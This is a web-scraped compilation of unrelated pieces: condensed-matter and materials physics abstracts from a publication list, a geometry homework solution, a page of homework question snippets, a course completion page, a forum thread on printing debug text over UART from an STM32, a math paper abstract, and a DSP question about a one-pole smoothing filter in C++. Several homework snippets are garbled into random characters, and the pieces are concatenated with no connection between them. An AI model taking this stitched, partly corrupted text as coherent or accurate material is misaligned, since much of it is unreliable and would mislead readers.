At zero temperature a disordered solid corresponds to a local minimum in the energy landscape. As the temperature is raised or the system is driven with a mechanical load, the system explores different minima via dynamical events in which particles rearrange their relative positions. We have shown recently that the dynamics of particle rearrangements are strongly correlated with a structural quantity associated with each particle, softness'', which we can identify using supervised machine learning. Particles of a given softness have a well-defined energy scale that governs local rearrangements; because of this property, softness greatly simplifies our understanding of glassy dynamics. Here we investigate the correlation of softness with other commonly used structural quantities, such as coordination number and local potential energy. We show that although softness strongly correlates with these properties, its predictive power for rearrangement dynamics is much higher. We introduce a useful metric for quantifying the quality of structural quantities as predictors of dynamics. We hope that, in the future, authors introducing new structural measures of dynamics will compare their proposals quantitatively to softness using this metric. We also show how softness correlations give insight into rearrangements. Finally, we explore the physical meaning of softness using unsupervised dimensionality reduction and reduced curve-fitting, models, and show that softness can be recast in a form that is amenable to analytical treatment.
Montemore M, Kaxiras E. Structure and reactivity of AgAu Alloys. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;251.
Cao Y, Luo JY, Fatemi V, Fang S, Sanchez-Yamagishi JD, Watanabe K, Taniguchi T, Kaxiras E, Jarillo-Herrero P. Superlattice-Induced Insulating States and Valley-Protected Orbits in Twisted Bilayer Graphene. PHYSICAL REVIEW LETTERS. 2016;117 (11).Abstract
Twisted bilayer graphene (TBLG) is one of the simplest van der Waals heterostructures, yet it yields a complex electronic system with intricate interplay between moire physics and interlayer hybridization effects. We report on electronic transport measurements of high mobility small angle TBLG devices showing clear evidence for insulating states at the superlattice band edges, with thermal activation gaps several times larger than theoretically predicted. Moreover, Shubnikov-de Haas oscillations and tight binding calculations reveal that the band structure consists of two intersecting Fermi contours whose crossing points are effectively unhybridized. We attribute this to exponentially suppressed interlayer hopping amplitudes for momentum transfers larger than the moire wave vector.
Heller EJ, Yang Y, Kocia L, Chen W, Fang S, Borunda M, Kaxiras E. Theory of Graphene Raman Scattering. ACS NANO. 2016;10 (2) :2803-2818.Abstract
Raman scattering plays a key role in unraveling the quantum dynamics of graphene, perhaps the most promising material of recent times. It is crucial to correctly interpret the meaning of the spectra. It is therefore very surprising that the widely accepted understanding of Raman scattering, i.e., Kramers Heisenberg Dirac theory, has never been applied to graphene. Doing so here, a remarkable mechanism we term''transition sliding'' is uncovered, explaining the uncommon brightness of overtones in graphene. Graphene's dispersive and fixed Raman bands, missing bands, defect density and laser frequency dependence of band intensities, widths of overtone bands, Stokes, anti -Stokes anomalies, and other known properties emerge simply and directly.
2015
Fang S, Defo RK, Shirodkar SN, Lieu S, Tritsaris GA, Kaxiras E. Ab initio tight-binding Hamiltonian for transition metal dichalcogenides. PHYSICAL REVIEW B. 2015;92 (20).Abstract
We present an accurate ab initio tight-binding Hamiltonian for the transition metal dichalcogenides, MoS2, MoSe2, WS2, WSe2, with a minimal basis (the d orbitals for the metal atoms and p orbitals for the chalcogen atoms) based on a transformation of theKohn-Sham density functional theory Hamiltonian to a basis of maximally localized Wannier functions. The truncated tight-binding Hamiltonian, with only on-site, first, and partial second neighbor interactions, including spin-orbit coupling, provides a simple physical picture and the symmetry of the main band-structure features. Interlayer interactions between adjacent layers are modeled by transferable hopping terms between the chalcogen p orbitals. The full-range tight-binding Hamiltonian can be reduced to hybrid-orbital k . p effective Hamiltonians near the band extrema that capture important low-energy excitations. These ab initio Hamiltonians can serve as the starting point for applications to interacting many-body physics including optical transitions and Berry curvature of bands, of which we give some examples.
Kolesov G, Vinichenko D, Tritsaris GA, Friend CM, Kaxiras E. Anatomy of the Photochemical Reaction: Excited-State Dynamics Reveals the C-H Acidity Mechanism of Methoxy Photo-oxidation on Titania. JOURNAL OF PHYSICAL CHEMISTRY LETTERS. 2015;6 (9) :1624-1627.Abstract
Light-driven chemical reactions on semiconductor surfaces have potential for addressing energy and pollution needs through efficient chemical synthesis; however, little is known about the time evolution of excited states that determine reaction pathways. Here, we study the photo-oxidation of methoxy (CH3O) derived from methanol on the rutile TiO2(110) surface using ab initio simulations to create a molecular movie of the process. The movie sequence reveals a wealth of information on the reaction intermediates, time scales, and energetics. The reaction is broken in three stages, described by Lewis structures directly derived from the hole'' wave functions that lead to the concept of `photoinduced C-H acidity''. The insights gained from this work can be generalized to a set of simple rules that can predict the efficiency of photo-oxidation reactions in reactant-catalyst pairs.
Cubuk ED, S. S. Schoenholz, Rieser JM, Malone BD, Rottler J, Durian DJ, Kaxiras E, Liu AJ. Identifying Structural Flow Defects in Disordered Solids Using Machine-Learning Methods. PHYSICAL REVIEW LETTERS. 2015;114 (10).Abstract
We use machine-learning methods on local structure to identify flow defects-or particles susceptible to rearrangement-in jammed and glassy systems. We apply this method successfully to two very different systems: a two-dimensional experimental realization of a granular pillar under compression and a Lennard-Jones glass in both two and three dimensions above and below its glass transition temperature. We also identify characteristics of flow defects that differentiate them from the rest of the sample. Our results show it is possible to discern subtle structural features responsible for heterogeneous dynamics observed across a broad range of disordered materials.
Huang D, Song C-L, Webb TA, Fang S, Chang C-Z, Moodera JS, Kaxiras E, Hoffman JE. Revealing the Empty-State Electronic Structure of Single-Unit-Cell FeSe/SrTiO3. PHYSICAL REVIEW LETTERS. 2015;115 (1).Abstract
We use scanning tunneling spectroscopy to investigate the filled and empty electronic states of superconducting single-unit-cell FeSe deposited on SrTiO3(001). We map the momentum-space band structure by combining quasiparticle interference imaging with decay length spectroscopy. In addition to quantifying the filled-state bands, we discover a Gamma-centered electron pocket 75 meV above the Fermi energy. Our density functional theory calculations show the orbital nature of empty states at Gamma and explain how the Se height is a key tuning parameter of their energies, with broad implications for electronic properties.
Ostadhossein A, Cubuk ED, Tritsaris GA, Kaxiras E, Zhang S, van Duin ACT. Stress effects on the initial lithiation of crystalline silicon nanowires: reactive molecular dynamics simulations using ReaxFF. Physical Chemistry Chemical Physics. 2015;17 :3832-3840.Abstract
Silicon (Si) has been recognized as a promising anode material for the next-generation high-capacity lithium (Li)-ion batteries because of its high theoretical energy density. Recent in situ transmission electron microscopy (TEM) revealed that the electrochemical lithiation of crystalline Si nanowires
(c-SiNWs) proceeds by the migration of the interface between the lithiated Si (LixSi) shell and the pristine unlithiated core, accompanied by solid-state amorphization. The underlying atomic mechanisms of Li insertion into c-Si remain poorly understood. Herein, we perform molecular dynamics (MD) simulations using the reactive force field (ReaxFF) to characterize the lithiation process of c-SiNWs. Our calculations show that ReaxFF can accurately reproduce the energy barriers of Li migration from DFT calculations in
both crystalline (c-Si) and amorphous Si (a-Si). The ReaxFF-based MD simulations reveal that Li insertion into interlayer spacing between two adjacent (111) planes results in the peeling-off of the (111) facets and subsequent amorphization, in agreement with experimental observations. We find that breaking of the Si–Si bonds between (111)-bilayers requires a rather high local Li concentration, which explains the atomically sharp amorphous–crystalline interface (ACI). Our stress analysis shows that lithiation induces compressive stress at the ACI layer, causing retardation or even the stagnation of the reaction front, also in good agreement with TEM observations. Lithiation at high temperatures (e.g. 1200 K) shows that Li insertion into c-SiNW results in an amorphous to crystalline phase transformation at Li : Si composition
of about 4.2 : 1. Our modeling results provide a comprehensive picture of the effects of reaction and diffusion-induced stress on the interfacial dynamics and mechanical degradation of SiNW anodes under chemo-mechanical lithiation.
Chen W, Cui P, Zhu W, Kaxiras E, Gao Y, Zhang Z. Atomistic mechanisms for bilayer growth of graphene on metal substrates. Physical Review B. 2015;91 :045408.Abstract
Epitaxial growth on metal substrates has been shown to be the most powerful approach in producing large-scale high-quality monolayer graphene, yet it remains a major challenge to realize uniform bilayer graphene growth. Here we carry out a comparative study of the atomistic mechanisms for bilayer graphene growth on the (111) surfaces of Cu and Ni, using multiscale approaches combining first-principles calculations and rate-equation analysis. We first show that the relatively weak graphene-Cu interaction enhances the lateral diffusion and effective nucleation of C atoms underneath the graphene island, thereby making it more feasible to grow bilayer graphene on Cu. In contrast, the stronger graphene-Ni interaction suppresses the lateral mobility and dimerization of C atoms underneath the graphene, making it unlikely to achieve controlled growth of bilayer graphene on Ni. We then determine the critical graphene size beyond which nucleation of the second layer will take place. Intriguingly, the critical size exhibits an effective inverse “Ehrlich-Schwoebel barrier” effect, becoming smaller
for faster C migration from the Cu surface to the graphene-Cu interface sites across the graphene edge. These findings allow us to propose a novel alternating growth scheme to realize mass production of bilayer graphene.
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/skills-handbook-evaluating-and-simplifying-expressions-exercises-page-890/24 | ## Geometry: Common Core (15th Edition)
$r^2-2r+1$
We start with the given expression: $(r-1)^2$
To simplify an algebraic expression, we must eliminate any parentheses and combine like terms.
We expand the squared term: $(r-1)(r-1)$
We apply the distributive property to multiply the binomials: $r^2-r-r+1$
We combine the like terms by subtracting: $r^2-2r+1$
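The same steps can also be written as a single chain of equalities (a LaTeX restatement of the work above, added only for readability):

```latex
\begin{aligned}
(r-1)^2 &= (r-1)(r-1)\\
        &= r^2 - r - r + 1\\
        &= r^2 - 2r + 1
\end{aligned}
```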
https://solvedlib.com/check-my-work-the-fact-that-generally-accepted,436854 | # Check my work The fact that generally accepted accounting principles allow companies flexibility in choosing between...
##### In a study of concrete curing improvement process for prestressed beams, the following data were collected to determine the effect of curing time and temperature on the compression strength of the concrete The equation is AS M,(Time 48 ) M ( Temperature 25) Here are the data From these data_ do the following:Plot the data as you see fit Determine the regression coefficients using Data/Data Analysis/Regression in Excel (see note on using Excel for regression analysis) The standard deviation of th
##### Question 59 of 70According to the Kinetic Molecular TheoryA) The volume of the gas particles will impact the volume available to the gas.B) Gas particles exert pressure by colliding with one anotherC) The gas particles are moving in circular motions throughout the container:D) The average kinetic energy proportional to the temperature of the system:
##### CASE 2 CASHFLOW ANALYSIS As at Dec 31, 2017 and 2010 Liabilities and Shareholders' Equity 25....
CASE 2 CASHFLOW ANALYSIS As at Dec 31, 2017 and 2010 Liabilities and Shareholders' Equity 25. ONOD A ccred liabilities 14 $600 22.000 10.000 10,000 1.000 3.000 5200D te payable 10,000 Tonds pa 10.000 - 53,000 67.000 ++.000 10.000 Share capital 426D 15.000 10.000 Total buities and Total assets$...
##### Rrel [uwel huna clcthesline lu diy uuLs de lsses mcisture a a rate rnntent (Round "Dir answar dafimai nincer o4lionaMslure ccnteniIrtlunelulicinal muis-Mie cunleml AteLhe ISriel liaveul ils muis-ulenjurs Trt M10
##### 6t and [B(t)]= find j[A()I[B()]as . 4tGiven [A(t)]= t+1
##### What is nuclear fusion?
##### ] ] Ii 1 il 4 % J 1 1 2 1 1 V 8 1 1 2 2 L 3 7 V 28
##### (a) Find the torques about a fixed axis through O due to each of the applied...
(a) Find the torques about a fixed axis through O due to each of the applied forces shown in the figure to the right (stolen from the internet). (b) Find the angular acceleration of the bar if it is uniform and has a mass of 250 grams....
##### Expenmental psychologist hypothesizes thar eople cf ersonality type 4 scorc highet than people of personalty typc C on intelhgcnce test Thc Sprgrce tumcd ourtobc 81. whilc the mcan score of type 4 people was 31.62 &nd themean Scon fortype C people was 33.14 What i: scorc? '2(31.62-33 14) / 81 8 {7(31,62-33.14)( 90) 41.69 9 (31.62-33.14V.812 = -2 32 {F(31.62-33 14V[()( 81)]
##### Habun Inul tna ticnping diblarcn eiopcno diblanceYnnn KnctbqudiuapucdIravuli 20 nuteInutiingHananIinavun baveine Intab puhou (Iypo ntge daclmielobrung dialanea
##### 2 3 Optibn 32 8 9 4 3 5 J3 W 2 3 2 88 2 8 74 3
##### Crane Company sells one product. Presented below is information for January for Crane Company. Nov. 1...
Crane Company sells one product. Presented below is information for January for Crane Company. Nov. 1 Inventory 300 units at $12 each 5 Purchase 190 units at$13 each 10 Sale 430 units at $20 each 15 Purchase 430 units at$12.50 each 21 Sale 440 units at $21 each 30 Purchase 350 units at$12.80 each...
##### 21. Answer ALL parts of this question. The anti-inflammatory agent, (S)-naproxen sodium salt has a specific...
21. Answer ALL parts of this question. The anti-inflammatory agent, (S)-naproxen sodium salt has a specific rotation of +66º. The commercial preparation of the latter agent results in a mixture that has a 97% enantiomeric excess (ee). colo H3C0 (S)-naproxen sodium salt (a) Draw the R enantiomer...
##### Probability & Statistics (25 points) 1. (5 points) If the probability that student A will fail...
Probability & Statistics (25 points) 1. (5 points) If the probability that student A will fail a certain statistics examination is 0.3, the probability that student B will fail the examination is 0.2, and the probability that bosh student A and student B will fail the examination is 0.1. a) What...
##### How do you evaluate \frac { 12- 3y } { 2} + v \frac { 2y - 4} { y } for y=3?
##### A researcher finds that the mean value of depression = 15, and the variance = 9. Which Depression Score corresponds to a...
A researcher finds that the mean value of depression = 15, and the variance = 9. Which Depression Score corresponds to a z-score of +1?...
##### How do you write the equation log_3 81=4 in exponential form?
##### Find the dumensions of = rcctangular with a perimctc of 400 fect; wbosc alea i5 naxua (10 polnts)
##### Please answer all of them. Thank you!3.Being able to “see hot air†rising from a hot surfaceis due to (a) dispersion, (b) diffuse reflection, (c)refraction, (d) internal reflection.4.The critical angle for a water air interface is about480. Light will be transmitted from the water for an angle ofincidence of (a) 600, (b) 520, (c) 480, (d) 440. 5.A reverse in the direction of a wave due to aboundary is called (a) refraction, (b) interference,(c) reflection, (d) polarization. 6.A change
##### HF L VEE?7 V F H 2] F 0 58 1 L H 1 1 E : L { t JE U H HF { H 3 8 1 N 1 1 ; 1 : ; W 1 L 1 [ [ 3 1 0 3 W 1 I H 0 1 1 3 1 1 WHHH 1 IN 3 V ; 1 II V Iml IV 18 { H H I W 1 L VHH 2 1 2 } 4 IH 1 { [ 3 1] { 1 { N 1 5 2 TE 1 0 1 1 ] L 1 2 F 7 2 1 6 3 ! 1 1 3
##### Give thc value Give conclusion for thc hypothesis Interva Find 959 conlidance confidence Interval Write conclusion for theTwo Means carpeted rooms In hospitals contained more bacteria than Researchers wanted t0 check bacterla In aroom researchers pumped the air determine the umount uncarpeted rooms and eight uncarpeted rooms: Colonies of Petri dish for eight carpeted from the room over to form in the 16 Petri dishes. The results are presented in the table bacteria were allowed (Measured as bac
##### Draw the major nitrogen-contaC [Review Topicsl [Referencesl Drcooh Google Search mentftakeCovalentActivity do?locatorzassignment-take&takeAssignmentSessionLocator-assignment-take[Review Topice][References] Draw the major nitrogen-containing organic product(s) of the reaction shownAsNCHCNHCHCNHCHCOz 6N HCI 110 'C CHzOH CH3 CH(CH3hzDraw only the product(s) containing nitrogen Draw products in the ionic forms obtained under the reaction conditions Do not include counter-ions e.g-, Na mn yo
##### Ialues] ell BlConsider the curve IA Find the point(s) where the Hangent line is horizontal]and findithe point(s) where the tangent line is vertical
##### Doter Detutm 1 1 1 end ol an 1 1 advertising IH V 1 reach chullaulu uccoiding [0 Lsi000"
##### 8. Given F() = < In L Vi , e > a). Find the domain of 7() _ 0 1t -/b) Find If()|l:Li~Find 7"%).d) Find (v(o)asPlnd Imro)
##### 10 Question (1 point)Ist attemptJhl See Periodic TableScc HinThe reaction0f 5.60 Rol c carbon with excess Oz yields 9.75 gof COz What fs the percent yleld of this reaction?
##### Hardness is "commcy" measured by: Rockwell Test Brinell Test Vickers Test Both a & b O...
Hardness is "commcy" measured by: Rockwell Test Brinell Test Vickers Test Both a & b O a, b, &c Alloys of nickel are commercially important and are mainly noted for ______ and ductility and being a noble metal. high thermal conductivity, high electrical conductivity. O corrosion resi...
##### Part 0Complete the fourlh row of the table_ Express your answer using two signlticant liguresAEdX-10"M+ASubmltProvious Anewon Requost AnsworIncorrect; Try Agaln; 5 attempte remalning
##### Suppose that in Exercise 61 , instead of $f(x)=\cos x,$ we use $g(x)=\sin x(0 \leq x \leq 1)$ for the growth function. (a) Complete a table similar to the one in Exercise $61(b)$ (assuming $x_{0}=50$ ). (b) What do you think would be the long-term behavior of this population?
https://academy.vertabelo.com/course/common-table-expressions/final-quiz/summary/congratulations
14. Congratulations
## Instruction
Perfect! That was the last exercise in our quiz and you've done pretty well!
This is where our course ends. We've done quite a lot: single CTEs, multiple CTEs, nested CTEs, recursion, INSERT/UPDATE/DELETE with CTEs… pretty much everything you need in order to successfully use Common Table Expressions. We hope the knowledge you have gained will prove useful to you.
If you enjoyed the course, please leave us a rating and take a look at other courses we offer. Thank you for studying with Vertabelo Academy!
## Exercise
Press to finish the course.
https://electronics.stackexchange.com/questions/341231/stm32-print-via-uart-without-nucleo-discovery/454890 | STM32 print via UART without Nucleo/Discovery
I would like for debugging/trace purposes to print texts (preferably via printf but just text is also fine) from an STM32F103C8T6 to a (PC) terminal application.
I noticed that all examples use a Nucleo or Discovery board but I don't have those. I'm using ST Link/V2 and System Workbench (Eclipse).
Does anybody know how to do this or if it is even possible? (I guess so with some USB/RS232 converter maybe).
• You can print the string on any UART lines and use a UART to USB converter to see it on PC terminal. Because a Nucleo/Discovery has a onboard UART/USB converter which does exactly the same thing. – ammar.cma Nov 22 '17 at 10:25
• Check this tool: st.com/en/development-tools/stm-studio-stm32.html A bit better than sending strings. – Bence Kaulics Nov 22 '17 at 11:30
• @BenceKaulics If it works together with Eclipse then it would be very useful. – Michel Keijzers Nov 22 '17 at 11:41
• It is not a plugin but a completely independent tool. – Bence Kaulics Nov 22 '17 at 12:17
• @BenceKaulics I know ... but I cannot e.g. use ST Link Utility together (simultaneously) with Eclipse; probably with that tool I would have the same problem. – Michel Keijzers Nov 22 '17 at 12:18
All the STM32F1 parts that I can think of come with UART hardware – meaning that you just need to write your string to some address, and trigger the transfer.
The knowledge of how to do that can be taken from the Reference Manual of that family (ST Document number RM0008), or just straight from the UART driver within the STM Cube software package.
Electrically, you'll really get a TTL UART – any TTL serial-to-USB converter will do. The Nucleo boards just contain a second microcontroller that plays a USB-to-STLink and USB-to-TTL-UART bridge.
For "easy" debugging, the UART is certainly the least error-prone communications interface in the chip. If you're tempted to directly communicate with the PC: Your MCU comes with a USB2 transceiver. You can, adding a few resistors, directly connect that to your PC, and let it look like a serial adapter itself, just giving you your messages or data! That is, given you have a firmware that handles the USB stack. ST offers a library to do that, and that comes with examples. Be warned though that USB is way more complicated than UART, and if you just want to occasionally print short strings, UART certainly is sufficient. The USB interface allows you to send USB data packets through USB2 Full Speed (that's the 12Mb/s standard) – that can be hell of an advantage if you need e.g. to build something that samples a signal rapidly (that's why I used USB on an ARM the first time) in the long term.
• Thanks for the answer ... I just need some data (I doubt I need 12 MB/s, at least not for now)... I will check further into the TTL serial to USB converter ... will my PC automatically detect it as a com port or should I install a driver to have it visible in a terminal application? – Michel Keijzers Nov 22 '17 at 10:31
• Windows generally comes with drivers installed because this has been around for a while. Use HyperTerminal or PuTTY to open the COM port on the baud rate you set in firmware and you should be able to see the ASCII characters. – ammar.cma Nov 22 '17 at 10:33
• @ammar.cma Thanks ... also I found this learn.sparkfun.com/tutorials/how-to-install-ftdi-drivers/all to install ftdi drivers, so even in case it is not autoamtically I can try that. – Michel Keijzers Nov 22 '17 at 10:34
• @MichelKeijzers It depends on the TTL/USB adapter you get and which chip it uses inside. FTDI is common, but cheap knockoffs come from different vendors and thus different drivers. Although, you shouldn't have a problem with drivers. (tons of online tutorials for that) – ammar.cma Nov 22 '17 at 10:36
• @ammar.cma I have a cheap knockoff probably ... but I will check if it works (when I have time)... it's a 'hobby' project getting out of hand a bit :-) ... but a good way to learn about microprocessors. – Michel Keijzers Nov 22 '17 at 10:49
There is no problem with it. You have a few options. The first way is to configure your UART (the process may be very straightforward if you use CubeMX) to send text and then hook up the RX and GND pins of your USB-RS232 converter to the TX and GND pins of your board respectively. Then you can transmit your logs, for example with the function HAL_UART_Transmit(). A more advanced option is to redirect stdout to that UART, but it will take a lot of effort to configure and run this.
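For illustration, a minimal sketch of that first approach in C (assuming an STM32F103 project whose UART handle huart1 has already been configured, e.g. by CubeMX; the helper name and the 100 ms timeout are arbitrary placeholders, not part of the answer above):

```c
#include <string.h>
#include "stm32f1xx_hal.h"        /* assumed F1-series HAL header */

extern UART_HandleTypeDef huart1; /* assumed to be initialized elsewhere */

/* Blocking transmit of a debug string over the configured UART. */
void debug_print(const char *msg)
{
    HAL_UART_Transmit(&huart1, (uint8_t *)msg, (uint16_t)strlen(msg), 100);
}
```

A call such as debug_print("hello from STM32\r\n"); should then show up in the PC terminal connected to the USB-serial converter.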
There is a third way to solve your problem and it is called semihosting. I have very little experience with it and I can't recommend using it. A semihosted event halts the MCU and needs support from the debug tools to handle the semihosted operation; without debug tools attached, a semihosted event will permanently halt the MCU.
• I will try the first mechanism ... the SWO seems good, but it's not nice to have not simultaneously an IDE open (I need to upload very often). And it's for a hobby project, probably Keil is too expensive to buy just for some hobby. The last sounds interesting too, although I'm afraid it will affect my real program which I want to debug (using interrupts via DMA). – Michel Keijzers Nov 22 '17 at 11:04
• @MichelKeijzers keil have free evaluational licenses with 32kb code limit. If your app is less than that, you can give it a try. Believe me: with SWO you can achieve your result much faster, than with any other way. Besides there are still some ways to make it work with System Workbench. – Vadimchik Nov 22 '17 at 11:15
• Currently I use only 15 KB, but I'm sure eventually I will use more. I'm using now a STM32F103C8T6 which has 64 KB, but eventually I use a 512 KB version, and I think I will need at least a few hundred (not sure yet though). But for 'hardware tests' I can use the prints in a smaller footprint. I will also check the 'some ways' link, thank you – Michel Keijzers Nov 22 '17 at 11:26
• @MichelKeijzers You can use ITM with the IDE still open and connected. In fact that's how I used it the first time I used STM32. I did not know that you could read printfs over debug interface. I was surprised to see printf output when I had neither connected the USB port nor the UART on the MCU to my computer. You can use breakpoints etc. also. Point is it does not interfere with the way you'd normally use your IDE and Debugger. – Dojo Feb 22 '18 at 16:28
• @MichelKeijzers I had tried this in AC6 System Workbench. Just got a mailer form ST that True Studio Pro is now free! Got to try it! – Dojo Feb 22 '18 at 17:28
The procedure is pretty much the same as with a Nucleo board. As was later pointed out to me, the specifics will be different on different STM32 chips, but here's what I used (on an STM32WB55). I assume your job will be similar at a high-level, but the details of the specific API calls may be different.
Also note that if you use CubeMX to assign and configure the UART, then code for steps 1 and 2 should be auto-generated, allowing you to skip to step 3.
1. Configure the GPIO pins used by the UART (in the STM HAL environment, implement the function HAL_UART_MspInit; the HAL library will call it when you are ready to initialize the UART). A combined sketch of steps 1 and 2 is shown after the parameter list below.
• Make sure you select pins that have UART/USART capability on your chip. Look for your chip's ...hal_gpio_ex.h header (e.g. stm32wbxx_hal_gpio_ex.h) to see the table of GPIO pins and alternate functions. In my case, I'm using PB6 (USART1_TX) and PB7 (USART1_RX), which are the ones used by the ST-Link interface on my Nucleo board. Your chip may have different options available.
• Enable the appropriate clocks for the device and GPIO pins you're using (e.g. USART1 and GPIOB in my case)
• Initialize the GPIO pins. Mode should be AF_PP. I set pull to PULLUP. Set the alternate mode as appropriate for your chip (see above; in my case, AF7_USART1).
2. Initialize the appropriate UART via a call to HAL_UART_Init. The parameters I use (on an STM32WB55) are:
• Instance = USART1 (use whatever you chose above when configuring the GPIOs)
• Init.BaudRate = 115200
• Init.WordLength = UART_WORDLENGTH_8B. Note that this length includes any parity. So if you use parity, set this to _9B (or configure your terminal for 7-bit words).
• Init.StopBits = UART_STOPBITS_1
• Init.Parity = UART_PARITY_NONE
• Init.Mode = UART_MODE_TX_RX (you could use just _TX, if you're never going to read from the UART)
• Init.HwFlowCtl = UART_HWCONTROL_NONE. I haven't seen a need for CTS/RTS when using a USB connection to a terminal emulator on a PC. But you may need it for your application. If you do, be sure to wire and configure the corresponding GPIO pins.
• Init.OverSampling = UART_OVERSAMPLING_16. I'm not sure what this does. This is what ST's sample code uses
• Init.OneBitSampling = UART_ONE_BIT_SAMPLE_DISABLE. Not sure about this either. ST's sample code uses this.
• Init.ClockPrescaler = UART_PRESCALER_DIV1. Not sure why you might want a different prescaler. Maybe to run at lower power or when your baudrate is much lower than your clock (e.g. 115200 bps with a 64 MHz clock)
• AdvancedInit.AdvFeatureInit = UART_ADVFEATURE_NO_INIT. Unless you want to use one of the advanced features (auto baud detect looks like it might be useful)
With this in place, you can call HAL_UART_Transmit to send bytes over the UART. If you want to link it up to printf, there's a bit more to go.
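Putting steps 1 and 2 together, here is a minimal, untested sketch for the STM32WB55 used in this answer (PB6/PB7 on USART1 as above; the function name uart1_init and the error handling are my own placeholders, and the field names follow the ST HAL headers — on other families such as the F103, some of these fields, e.g. OneBitSampling, ClockPrescaler and AdvancedInit, do not exist):

```c
#include "stm32wbxx_hal.h"

UART_HandleTypeDef huart1;

/* Step 1: the HAL calls this from HAL_UART_Init() */
void HAL_UART_MspInit(UART_HandleTypeDef *huart)
{
    if (huart->Instance == USART1) {
        GPIO_InitTypeDef gpio = {0};

        __HAL_RCC_USART1_CLK_ENABLE();  /* peripheral clock */
        __HAL_RCC_GPIOB_CLK_ENABLE();   /* GPIO port clock  */

        gpio.Pin       = GPIO_PIN_6 | GPIO_PIN_7;   /* PB6 = TX, PB7 = RX */
        gpio.Mode      = GPIO_MODE_AF_PP;
        gpio.Pull      = GPIO_PULLUP;
        gpio.Speed     = GPIO_SPEED_FREQ_HIGH;
        gpio.Alternate = GPIO_AF7_USART1;
        HAL_GPIO_Init(GPIOB, &gpio);
    }
}

/* Step 2: configure and initialize USART1 with the parameters listed above */
void uart1_init(void)
{
    huart1.Instance                    = USART1;
    huart1.Init.BaudRate               = 115200;
    huart1.Init.WordLength             = UART_WORDLENGTH_8B;
    huart1.Init.StopBits               = UART_STOPBITS_1;
    huart1.Init.Parity                 = UART_PARITY_NONE;
    huart1.Init.Mode                   = UART_MODE_TX_RX;
    huart1.Init.HwFlowCtl              = UART_HWCONTROL_NONE;
    huart1.Init.OverSampling           = UART_OVERSAMPLING_16;
    huart1.Init.OneBitSampling         = UART_ONE_BIT_SAMPLE_DISABLE;
    huart1.Init.ClockPrescaler         = UART_PRESCALER_DIV1;
    huart1.AdvancedInit.AdvFeatureInit = UART_ADVFEATURE_NO_INIT;

    if (HAL_UART_Init(&huart1) != HAL_OK) {
        /* handle the error as appropriate for your project */
        while (1) { }
    }
}
```

Note that AdvFeatureInit lives in the AdvancedInit member of the handle rather than in Init; that is how the WB-series HAL header declares it.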
1. Add a "syscalls.c" file to your project, if you don't already have one. Copy it from one of ST's sample programs. The CubeMX tool, if you use it, should generate one for you. This will provide most of the glue for stdout
2. Implement the function int __io_putchar(int c). This is called repeatedly by code in syscalls for writing characters to your console. Your implementation should call HAL_UART_Transmit to send the character to the UART. Be sure to return the character that was written to the UART as well
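A minimal sketch of that retarget function, assuming the same huart1 handle as in the sketch above and a GCC/newlib-style syscalls.c whose _write() calls __io_putchar():

```c
#include "stm32wbxx_hal.h"

extern UART_HandleTypeDef huart1;  /* initialized as shown earlier */

/* Called once per character that printf() emits. */
int __io_putchar(int ch)
{
    uint8_t c = (uint8_t)ch;
    HAL_UART_Transmit(&huart1, &c, 1, HAL_MAX_DELAY);
    return ch;
}
```

Depending on your terminal settings, you may also want to translate '\n' into "\r\n" here.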
Of course, after doing this, be sure to attach something (like your ST Link) to your configured GPIO UART pins (minimum TX and RX. CTS and RTS if you're using hardware flow control) so you can connect them to a PC.
• Beware of getting so deep into the hardware configuration detail: this is substantially different between STM32 subfamilies, and specifically what you describe for the STM32WB will not match the STM32F103 mentioned in the question. – Chris Stratton Aug 30 at 13:20
• What doesn't match? I wrote that the particular GPIO pins used will be different. Are the HAL functions incompatible across products? That pretty much undermines the point of having a HAL. – David C. Aug 30 at 14:59
• Most except for the actual line coding and perhaps the oversampling mismatches; in practice an MCU HAL like this doesn't really abstract hardware unique details, it just names them, and the hardware itself is notably different between the chip you are familiar with and the one the question is about. – Chris Stratton Aug 30 at 15:24
https://www.aimsciences.org/article/doi/10.3934/cpaa.2016040 | # American Institute of Mathematical Sciences
November 2016, 15(6): 2357-2372. doi: 10.3934/cpaa.2016040
## Elliptic operators with unbounded diffusion coefficients perturbed by inverse square potentials in $L^p$-spaces

1. Università degli Studi di Pavia, Dipartimento di Matematica “F. Casorati”, via Ferrata 1, 27100 Pavia
2. Dipartimento di Fisica, Università degli Studi di Salerno, via Giovanni Paolo II, 132, 84084, Fisciano (Sa), Italy
3. Dipartimento di Ingegneria dell'Informazione e Matematica Applicata, Università degli Studi di Salerno, Via Ponte Don Melillo, 84084 Fisciano (Sa)

Received: March 2016. Revised: June 2016. Published: September 2016.
In this paper we give sufficient conditions on $\alpha \ge 0$ and $c\in \mathbb{R}$ ensuring that the space of test functions $C_c^\infty(\mathbb{R}^N)$ is a core for the operator
$$L_0u=(1+|x|^\alpha )\Delta u+\frac{c}{|x|^2}u=:Lu+\frac{c}{|x|^2}u,$$
and that $L_0$, with a suitable domain, generates a quasi-contractive and positivity-preserving $C_0$-semigroup in $L^p(\mathbb{R}^N)$, $1 < p < \infty$. The proofs are based on an $L^p$-weighted Hardy inequality and perturbation techniques.
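For background, the classical Hardy inequality on $\mathbb{R}^N$ is recalled below purely as a reference point; the weighted $L^p$ variants actually used in the proofs are not spelled out in the abstract and would have to be taken from the paper itself.
$$\int_{\mathbb{R}^N} \frac{|u(x)|^p}{|x|^p}\,dx \;\le\; \left(\frac{p}{N-p}\right)^{p} \int_{\mathbb{R}^N} |\nabla u(x)|^p\,dx, \qquad u\in C_c^\infty(\mathbb{R}^N),\quad 1<p<N.$$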
Citation: Simona Fornaro, Federica Gregorio, Abdelaziz Rhandi. Elliptic operators with unbounded diffusion coefficients perturbed by inverse square potentials in $L^p$-spaces. Communications on Pure & Applied Analysis, 2016, 15(6): 2357-2372. doi: 10.3934/cpaa.2016040
https://dsp.stackexchange.com/questions/33858/how-does-this-simple-filter-work/33862 | # How does this “simple filter” work?
I'm new to DSP, and I'm using this basic "1-pole LPF" param-smoothing filter, which smooths a parameter when I change it. The code is pretty simple:
class CParamSmooth
{
public:
    double a, b, z;               // a: feedback coefficient (the pole), b: input gain, z: state (previous output)
    CParamSmooth() {
        a = 0.8;                  // closer to 1.0 = slower, smoother response
        b = 1. - a;               // gains sum to 1, so the output settles at the input value
        z = 0.;
    }
    double Process(double in) {
        z = (in * b) + (z * a);   // weighted average of the new input and the previous output
        return z;
    }
};
